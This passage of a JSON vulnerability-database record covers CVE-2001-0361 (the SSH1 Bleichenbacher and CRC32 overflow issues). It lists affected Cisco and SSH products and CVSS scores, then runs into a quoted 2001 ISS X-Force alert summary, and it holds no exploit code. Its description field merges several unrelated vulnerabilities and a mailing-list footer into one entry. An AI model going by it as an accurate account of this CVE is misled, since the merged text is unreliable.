"vendor": "ssh",
"version": "2.1"
},
{
"model": "communications security ssh2",
"scope": "ne",
"trust": 0.3,
"vendor": "ssh",
"version": "2.0"
},
{
"model": "openssh",
"scope": "ne",
"trust": 0.3,
"vendor": "openssh",
"version": "2.3"
},
{
"model": "pix firewall",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "5.3(2)"
},
{
"model": "pix firewall",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "5.2(6)"
},
{
"model": "ios",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "12.2(3)"
},
{
"model": "ios 12.2 t",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2 xa",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "12.2(1.1)"
},
{
"model": "ios 12.2 xq",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2 xh",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2 xd1",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1 e",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1 ec3",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1 ez1",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1 ey",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1 yf2",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1 yd2",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1 yc1",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1 yb4",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1 xy6",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "12.1(5)xv3"
},
{
"model": "ios 12.1 xu1",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1 xr2",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1 xg5",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1 xm4",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1 xt3",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1 xp4",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.0 s",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "webns 0b17s",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.1"
},
{
"model": "webns 0b13s",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.1"
},
{
"model": "webns b19s",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0.1"
},
{
"model": "webns",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0.1"
},
{
"model": "webns 1b29s",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0"
},
{
"model": "webns 1b23s",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0"
},
{
"model": "webns",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0"
},
{
"model": "webns",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.1"
},
{
"model": "webns",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.0"
},
{
"model": "pix firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.2"
},
{
"model": "pix firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.1"
},
{
"model": "pix firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.0"
},
{
"model": "pix firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.3"
},
{
"model": "pix firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.2"
},
{
"model": "ios 12.2yh",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2yg",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2yf",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2yd",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2yc",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2yb",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2ya",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2xw",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2xt",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2xs",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2xr",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2xn",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2xm",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2xl",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2xk",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2xj",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2xi",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2xg",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2xf",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2xb",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2s",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2dd",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2da",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2bc",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2b",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1yi",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1ye",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "12.0xv"
},
{
"model": "ios 12.0xm",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.0xb",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.0st",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.0sp",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "css11000 content services switch",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60007.1(2)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60007.1"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60006.3(4)"
},
{
"model": "catalyst pan",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60006.3"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60006.2(0.111)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60006.1(2.13)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60006.1(1)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60005.5(4)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60005.5(3)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60005.5(2)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60005.5(13)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60005.5(1)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60005.4.1"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60005.4(4)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60005.4(3)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60005.4(2)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60005.4(1)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60005.4"
},
{
"model": "lamm pgp4pine",
"scope": "eq",
"trust": 0.3,
"vendor": "holger",
"version": "1.75.6"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#161576"
},
{
"db": "CERT/CC",
"id": "VU#290140"
},
{
"db": "CERT/CC",
"id": "VU#13877"
},
{
"db": "CERT/CC",
"id": "VU#25309"
},
{
"db": "CERT/CC",
"id": "VU#945216"
},
{
"db": "CERT/CC",
"id": "VU#566640"
},
{
"db": "CERT/CC",
"id": "VU#315308"
},
{
"db": "BID",
"id": "2347"
},
{
"db": "BID",
"id": "2344"
},
{
"db": "BID",
"id": "5114"
},
{
"db": "BID",
"id": "2405"
},
{
"db": "CNNVD",
"id": "CNNVD-200106-182"
},
{
"db": "NVD",
"id": "CVE-2001-0361"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:1.2.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ssh:ssh:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.2.31",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:2.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:2.1.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2001-0361"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Discovered by Michal Zalewski \u003clcamtuf@bos.bindview.com\u003e on Feb 8, 2001.",
"sources": [
{
"db": "BID",
"id": "2347"
}
],
"trust": 0.3
},
"cve": "CVE-2001-0361",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 4.9,
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2001-0361",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#161576",
"trust": 0.8,
"value": "6.48"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#290140",
"trust": 0.8,
"value": "21.09"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#13877",
"trust": 0.8,
"value": "6.84"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#25309",
"trust": 0.8,
"value": "0.39"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#945216",
"trust": 0.8,
"value": "99.00"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#566640",
"trust": 0.8,
"value": "0.68"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#651994",
"trust": 0.8,
"value": "1.50"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#315308",
"trust": 0.8,
"value": "2.06"
},
{
"author": "CNNVD",
"id": "CNNVD-200106-182",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#161576"
},
{
"db": "CERT/CC",
"id": "VU#290140"
},
{
"db": "CERT/CC",
"id": "VU#13877"
},
{
"db": "CERT/CC",
"id": "VU#25309"
},
{
"db": "CERT/CC",
"id": "VU#945216"
},
{
"db": "CERT/CC",
"id": "VU#566640"
},
{
"db": "CERT/CC",
"id": "VU#651994"
},
{
"db": "CERT/CC",
"id": "VU#315308"
},
{
"db": "CNNVD",
"id": "CNNVD-200106-182"
},
{
"db": "NVD",
"id": "CVE-2001-0361"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Implementations of SSH version 1.5, including (1) OpenSSH up to version 2.3.0, (2) AppGate, and (3) ssh-1 up to version 1.2.31, in certain configurations, allow a remote attacker to decrypt and/or alter traffic via a \"Bleichenbacher attack\" on PKCS#1 version 1.5. An implementation problem in at least one Secure Shell (SSH) product and a weakness in the PKCS#1_1.5 public key encryption standard allows attackers to recover plaintext of messages encrypted with SSH. Multiple Cisco networking products contain a denial-of-service vulnerability. There is an information integrity vulnerability in the SSH1 protocol that allows packets encrypted with a block cipher to be modified without notice. There is a remote integer overflow vulnerability in several implementations of the SSH1 protocol that allows an attacker to execute arbitrary code with the privileges of the SSH daemon, typically root. The program pgp4pine version 1.75.6 fails to properly identify expired keys when working with the Gnu Privacy Guard program (GnuPG). This failure may result in the clear-text transmission of senstive information when used with the PINE mail reading package. The SEDUM web server permits intruders to access files outside the web root. SSH or code based on SSH is used by many systems all over the world and in a wide variety of commercial applications. An integer-overflow bug in the CRC32 compensation attack detection code may allow remote attackers to write values to arbitrary locations in memory. \nThis would occur in situations where large SSH packets are recieved by either a client or server, and a 32 bit representation of the SSH packet length is assigned to a 16 bit integer. The difference in data representation in these situations will cause the 16 bit variable to be assigned to zero (or a really low value). \nAs a result, future calls to malloc() as well as an index used to reference locations in memory can be corrupted by an attacker. This could occur in a manner that can be exploited to write certain numerical values to almost arbitrary locations in memory. \n**UPDATE**:\nThere have been reports suggesting that exploitation of this vulnerability may be widespread. \nSince early september, independent, reliable sources have confirmed that this vulnerability is being exploited by attackers on the Internet. Security Focus does not currently have the exploit code being used, however this record will be updated if and when it becomes available. \nNOTE: Cisco 11000 Content Service Switch family is vulnerable to this issue. All WebNS releases prior, but excluding, versions: 4.01 B42s, 4.10 22s, 5.0 B11s, 5.01 B6s, are vulnerable. \nSecure Computing SafeWord Agent for SSH is reportedly prone to this issue, as it is based on a vulnerable version of SSH. \n** NetScreen ScreenOS is not directly vulnerable to this issue, however the referenced exploit will cause devices using vulnerable versions of the software to stop functioning properly. This will result in a denial of service condition for NetScreen devices. This issue is in the Secure Command Shell (SCS) administrative interface, which is an implementation of SSHv1. SCS is not enabled on NetScreen devices by default. The data encryption techniques described in RSA\u0027s PKCS #1 standard are used in many protocols which rely on, at least in part, the security provided by public-key cryptography systems. \nSeveral protocols which implement the digital enveloping method described in version 1.5 of the PKCS #1 standard are susceptible to an adaptive ciphertext attack which may allow the recovery of session keys, thus compromising the integrity of the data transmitting during that session. \nBy capturing and logging the packets transmitted between a client and a server, an opponent could make use of a captured encrypted session key to launch a Bleichenbacher attack together with a simple timing attack. If the session key is successfully decrypted, the saved packets can easily be decrypted in a uniform manner. \nInteractive key establishment protocols, such as SSH or SSL, are generally significantly more susceptible to successful attacks. \nCisco has reported that scanning for SSH vulnerabilities on affected devices will cause excessive CPU consumption. The condition is due to a failure of the Cisco SSH implementation to properly process large SSH packets. As many of these devices are critical infrastructure components, more serious network outages may occur. \nCisco has released upgrades that will eliminate this vulnerability. An expired public key could cause GPG to fail the encryption of an outgoing message, without any error message or warning being delivered to the user. As a result, the user could transmit data, meant to be encrypted, as plaintext. \nTO UNSUBSCRIBE: email \"unsubscribe alert\" in the body of your message to\nmajordomo@iss.net Contact alert-owner@iss.net for help with any problems!\n---------------------------------------------------------------------------\n\n-----BEGIN PGP SIGNED MESSAGE-----\n\nISS X-Force has received reports that some individuals were unable to \nverify the PGP signature on the Security Alert Summary distributed earlier \nin the week. Due to this issue, X-Force is re-distributing the Security \nAlert Summary. We apologize for any inconvience this may have caused. \n\nInternet Security Systems Security Alert Summary\nMarch 5, 2001\nVolume 6 Number 4\n\nX-Force Vulnerability and Threat Database: http://xforce.iss.net/ To\nreceive these Alert Summaries as well as other Alerts and Advisories,\nsubscribe to the Internet Security Systems Alert mailing list at:\nhttp://xforce.iss.net/maillists/index.php\n\nThis summary can be found at http://xforce.iss.net/alerts/vol-6_num-4.php\n_____\n\nContents\n\n90 Reported Vulnerabilities\n\nRisk Factor Key\n\n_____\n\nDate Reported: 2/27/01\nVulnerability: a1-server-dos\nPlatforms Affected: A1 Server\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: A1 Server denial of service\nX-Force URL: http://xforce.iss.net/static/6161.php\n\n_____\n\nDate Reported: 2/27/01\nVulnerability: a1-server-directory-traversal\nPlatforms Affected: A1 Server\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: A1 Server directory traversal\nX-Force URL: http://xforce.iss.net/static/6162.php\n\n_____\n\nDate Reported: 2/27/01\nVulnerability: webreflex-web-server-dos\nPlatforms Affected: WebReflex\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: WebReflex Web server denial of service\nX-Force URL: http://xforce.iss.net/static/6163.php\n\n_____\n\nDate Reported: 2/26/01\nVulnerability: sudo-bo-elevate-privileges\nPlatforms Affected: Sudo\nRisk Factor: Medium\nAttack Type: Host Based\nBrief Description: Sudo buffer overflow could allow elevated user privileges\nX-Force URL: http://xforce.iss.net/static/6153.php\n\n_____\n\nDate Reported: 2/26/01\nVulnerability: mygetright-skin-overwrite-file\nPlatforms Affected: My GetRight\nRisk Factor: High\nAttack Type: Network Based\nBrief Description: My GetRight \u0027skin\u0027 allows remote attacker to overwrite existing files\nX-Force URL: http://xforce.iss.net/static/6155.php\n\n_____\n\nDate Reported: 2/26/01\nVulnerability: mygetright-directory-traversal\nPlatforms Affected: My GetRight\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: My GetRight directory traversal\nX-Force URL: http://xforce.iss.net/static/6156.php\n\n_____\n\nDate Reported: 2/26/01\nVulnerability: win2k-event-viewer-bo\nPlatforms Affected: Windows 2000\nRisk Factor: once-only\nAttack Type: Host Based\nBrief Description: Windows 2000 event viewer buffer overflow\nX-Force URL: http://xforce.iss.net/static/6160.php\n\n_____\n\nDate Reported: 2/26/01\nVulnerability: netscape-collabra-cpu-dos\nPlatforms Affected: Netscape\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: Netscape Collabra CPU denial of service\nX-Force URL: http://xforce.iss.net/static/6159.php\n\n_____\n\nDate Reported: 2/26/01\nVulnerability: netscape-collabra-kernel-dos\nPlatforms Affected: Netscape\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: Netscape Collabra Server kernel denial of service\nX-Force URL: http://xforce.iss.net/static/6158.php\n\n_____\n\nDate Reported: 2/23/01\nVulnerability: mercur-expn-bo\nPlatforms Affected: MERCUR\nRisk Factor: High\nAttack Type: Network Based\nBrief Description: MERCUR Mailserver EXPN buffer overflow\nX-Force URL: http://xforce.iss.net/static/6149.php\n\n_____\n\nDate Reported: 2/23/01\nVulnerability: sedum-http-dos\nPlatforms Affected: SEDUM\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: SEDUM HTTP server denial of service\nX-Force URL: http://xforce.iss.net/static/6152.php\n\n_____\n\nDate Reported: 2/23/01\nVulnerability: tru64-inetd-dos\nPlatforms Affected: Tru64\nRisk Factor: Medium\nAttack Type: Host Based\nBrief Description: Tru64 UNIX inetd denial of service\nX-Force URL: http://xforce.iss.net/static/6157.php\n\n_____\n\nDate Reported: 2/22/01\nVulnerability: outlook-vcard-bo\nPlatforms Affected: Microsoft Outlook\nRisk Factor: High\nAttack Type: Host Based\nBrief Description: Outlook and Outlook Express vCards buffer overflow\nX-Force URL: http://xforce.iss.net/static/6145.php\n\n_____\n\nDate Reported: 2/22/01\nVulnerability: ultimatebb-cookie-member-number\nPlatforms Affected: Ultimate Bulletin Board\nRisk Factor: High\nAttack Type: Network Based\nBrief Description: Ultimate Bulletin Board cookie allows attacker to change member number\nX-Force URL: http://xforce.iss.net/static/6144.php\n\n_____\n\nDate Reported: 2/21/01\nVulnerability: ultimatebb-cookie-gain-privileges\nPlatforms Affected: Ultimate Bulletin Board\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: Ultimate Bulletin Board allows remote attacker to obtain cookie information\nX-Force URL: http://xforce.iss.net/static/6142.php\n\n_____\n\nDate Reported: 2/21/01\nVulnerability: sendmail-elevate-privileges\nPlatforms Affected: Sendmail\nRisk Factor: High\nAttack Type: Host Based\nBrief Description: Sendmail -bt command could allow the elevation of privileges\nX-Force URL: http://xforce.iss.net/static/6147.php\n\n_____\n\nDate Reported: 2/21/01\nVulnerability: jre-jdk-execute-commands\nPlatforms Affected: JRE/JDK\nRisk Factor: High\nAttack Type: Host Based\nBrief Description: JRE/JDK could allow unauthorized execution of commands\nX-Force URL: http://xforce.iss.net/static/6143.php\n\n_____\n\nDate Reported: 2/20/01\nVulnerability: licq-remote-port-dos\nPlatforms Affected: LICQ\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: LICQ remote denial of service\nX-Force URL: http://xforce.iss.net/static/6134.php\n\n_____\n\nDate Reported: 2/20/01\nVulnerability: pgp4pine-expired-keys\nPlatforms Affected: pgp4pine\nRisk Factor: Medium\nAttack Type: Host Based\nBrief Description: pgp4pine may transmit messages using expired public keys\nX-Force URL: http://xforce.iss.net/static/6135.php\n\n_____\n\nDate Reported: 2/20/01\nVulnerability: chilisoft-asp-view-files\nPlatforms Affected: Chili!Soft ASP\nRisk Factor: High\nAttack Type: Network Based\nBrief Description: Chili!Soft ASP allows remote attackers to gain access to sensitive information\nX-Force URL: http://xforce.iss.net/static/6137.php\n\n_____\n\nDate Reported: 2/20/01\nVulnerability: win2k-domain-controller-dos\nPlatforms Affected: Windows 2000\nRisk Factor: once-only\nAttack Type: Network/Host Based\nBrief Description: Windows 2000 domain controller denial of service\nX-Force URL: http://xforce.iss.net/static/6136.php\n\n_____\n\nDate Reported: 2/19/01\nVulnerability: asx-remote-dos\nPlatforms Affected: ASX Switches\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: ASX switches allow remote denial of service\nX-Force URL: http://xforce.iss.net/static/6133.php\n\n_____\n\nDate Reported: 2/18/01\nVulnerability: http-cgi-mailnews-username\nPlatforms Affected: Mailnews.cgi\nRisk Factor: High\nAttack Type: Network Based\nBrief Description: Mailnews.cgi allows remote attacker to execute shell commands using username\nX-Force URL: http://xforce.iss.net/static/6139.php\n\n_____\n\nDate Reported: 2/17/01\nVulnerability: badblue-ext-reveal-path\nPlatforms Affected: BadBlue\nRisk Factor: Low\nAttack Type: Network Based\nBrief Description: BadBlue ext.dll library reveals path\nX-Force URL: http://xforce.iss.net/static/6130.php\n\n_____\n\nDate Reported: 2/17/01\nVulnerability: badblue-ext-dos\nPlatforms Affected: BadBlue\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: BadBlue ext.dll library denial of service\nX-Force URL: http://xforce.iss.net/static/6131.php\n\n_____\n\nDate Reported: 2/17/01\nVulnerability: moby-netsuite-bo\nPlatforms Affected: Moby\u0027s NetSuite\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: Moby\u0027s NetSuite Web server buffer overflow\nX-Force URL: http://xforce.iss.net/static/6132.php\n\n_____\n\nDate Reported: 2/16/01\nVulnerability: webactive-directory-traversal\nPlatforms Affected: WEBactive\nRisk Factor: Medium\nAttack Type: Network/Host Based\nBrief Description: WEBactive HTTP Server directory traversal\nX-Force URL: http://xforce.iss.net/static/6121.php\n\n_____\n\nDate Reported: 2/16/01\nVulnerability: esone-cgi-directory-traversal\nPlatforms Affected: ES.One store.cgi\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: Thinking Arts ES.One store.cgi directory traversal\nX-Force URL: http://xforce.iss.net/static/6124.php\n\n_____\n\nDate Reported: 2/16/01\nVulnerability: vshell-username-bo\nPlatforms Affected: VShell\nRisk Factor: High\nAttack Type: Network Based\nBrief Description: VShell username buffer overflow\nX-Force URL: http://xforce.iss.net/static/6146.php\n\n_____\n\nDate Reported: 2/16/01\nVulnerability: vshell-port-forwarding-rule\nPlatforms Affected: VShell\nRisk Factor: Medium\nAttack Type: Network/Host Based\nBrief Description: VShell uses weak port forwarding rule\nX-Force URL: http://xforce.iss.net/static/6148.php\n\n_____\n\nDate Reported: 2/15/01\nVulnerability: pi3web-isapi-bo\nPlatforms Affected: Pi3Web\nRisk Factor: Medium\nAttack Type: Network/Host Based\nBrief Description: Pi3Web ISAPI tstisapi.dll denial of service\nX-Force URL: http://xforce.iss.net/static/6113.php\n\n_____\n\nDate Reported: 2/15/01\nVulnerability: pi3web-reveal-path\nPlatforms Affected: Pi3Web\nRisk Factor: Low\nAttack Type: Network Based\nBrief Description: Pi3Web reveals physical path of server\nX-Force URL: http://xforce.iss.net/static/6114.php\n\n_____\n\nDate Reported: 2/15/01\nVulnerability: bajie-execute-shell\nPlatforms Affected: Bajie HTTP JServer\nRisk Factor: High\nAttack Type: Network Based\nBrief Description: Bajie HTTP JServer execute shell commands\nX-Force URL: http://xforce.iss.net/static/6117.php\n\n_____\n\nDate Reported: 2/15/01\nVulnerability: bajie-directory-traversal\nPlatforms Affected: Bajie HTTP JServer\nRisk Factor: High\nAttack Type: Network Based\nBrief Description: Bajie HTTP JServer directory traversal\nX-Force URL: http://xforce.iss.net/static/6115.php\n\n_____\n\nDate Reported: 2/15/01\nVulnerability: resin-directory-traversal\nPlatforms Affected: Resin\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: Resin Web server directory traversal\nX-Force URL: http://xforce.iss.net/static/6118.php\n\n_____\n\nDate Reported: 2/15/01\nVulnerability: netware-mitm-recover-passwords\nPlatforms Affected: Netware\nRisk Factor: Low\nAttack Type: Network Based\nBrief Description: Netware \"man in the middle\" attack password recovery\nX-Force URL: http://xforce.iss.net/static/6116.php\n\n_____\n\nDate Reported: 2/14/01\nVulnerability: firebox-pptp-dos\nPlatforms Affected: WatchGuard Firebox II\nRisk Factor: High\nAttack Type: Network Based\nBrief Description: WatchGuard Firebox II PPTP denial of service\nX-Force URL: http://xforce.iss.net/static/6109.php\n\n_____\n\nDate Reported: 2/14/01\nVulnerability: hp-virtualvault-iws-dos\nPlatforms Affected: HP VirtualVault\nRisk Factor: Medium\nAttack Type: Network/Host Based\nBrief Description: HP VirtualVault iPlanet Web Server denial of service\nX-Force URL: http://xforce.iss.net/static/6110.php\n\n_____\n\nDate Reported: 2/14/01\nVulnerability: kicq-execute-commands\nPlatforms Affected: KICQ\nRisk Factor: High\nAttack Type: Network Based\nBrief Description: kicq could allow remote execution of commands\nX-Force URL: http://xforce.iss.net/static/6112.php\n\n_____\n\nDate Reported: 